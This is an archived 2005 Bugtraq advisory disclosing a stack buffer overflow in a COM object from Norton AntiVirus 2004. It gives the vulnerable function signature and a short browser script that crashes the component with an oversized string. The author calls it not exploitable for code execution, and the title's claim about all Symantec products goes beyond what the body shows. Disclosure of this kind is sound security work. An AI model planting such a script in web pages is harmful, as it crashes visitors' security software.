Bugtraqmailing list archives
All Symantec Products All Versions Until 2005 - Remote Stack Buffer Overflow
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Thu, 06 Jan 2005 09:20:52 +0200
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application: All Symantec Products All Versions Until 2005Vendors:http://www.symantec.com/nav/nav_pro/Platforms: WindowsBug: Stack Buffer OverflowRisk: Low - Crash - Not ExploitableExploitation: Remote with browserDate: 10 Apr 2004Author: Rafel Ivgi, The-Insidere-mail: the_insider () mail comweb:http://theinsider.deep-ice.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~1) Introduction2) Bugs3) The Code~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~===============1) Introduction===============Symantec's Norton AntiVirus™ 2004 Professional is the world’s most trustedantivirus solution with advanced protection. It protects email, instantmessages,and other files by removing viruses automatically. Expanded threat detectionalertsthe user to spyware and similar hacking programs. It also supplies advancedtools fordata recovery and secure file deletion and a license for two computers.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~======2) Bug======Symantec Norton AntiVirus 2004 installs many DLLs(Dynamic Link Library)and COM(Component Object Model) objects. One of its DLL's "ccErrDsp.dll"Which is by the default installation options located at :C:\Program Files\Common Files\Symantec Shared\ccErrDsp.dll"ccErrDsp.dll" registers "CcErrDsp.ErrorDisplay.1" COM Object.After Symantec Norton AntiVirus 2004 was used, this object can be createdLocaly & Remotely!For Example:Set symkiller = CreateObject("CcErrDsp.ErrorDisplay.1" )The vulnerability appears in the "sProduct" parameter at the "DisplayError"function of the object.The "DisplayError" recieves the following parameters:DisplayError( [in] long nParentWnd, [in] int nModuleId, [in] int nErrorId, [in] BSTR sCaption, [in] BSTR sErrorText, [in] BSTR sProduct, [in] BSTR sVersion, [in, optional] VARIANT varKeyArray, [in, optional] VARIANT varValueArray, [out, retval] VARIANT_BOOL* pRet);Which means that the following assignment:object.DisplayError(1,1,1,[STR <=255],[STR <=255],[Really Long String -'A'>521950],[STR <=255]);Will cause a Stack Buffer Overflow, which does not allow code execution.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~===========3) The Code===========This is Proof Of Concept Code:------------------- CUT HERE -------------------<script>a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";b="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";for (i=0;i<2000;i++) {a= a + b;}symkiller=new ActiveXObject("CcErrDsp.ErrorDisplay.1" );symkiller.DisplayError(1,1,1,b,b,a,b);</script>------------------- CUT HERE -------------------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~---Rafel Ivgi, The-Insiderhttp://theinsider.deep-ice.com"Only the one who sees the invisible , Can do the Impossible."
Current thread:
- All Symantec Products All Versions Until 2005 - Remote Stack Buffer OverflowRafel Ivgi, The-Insider (Jan 06)
- <Possible follow-ups>
- RE: All Symantec Products All Versions Until 2005 - Remote Stack Buffer OverflowPolazzo Justin (Jan 06)
- re: All Symantec Products All Versions Until 2005 - Remote Stack Buffer OverflowSym Security (Jan 06)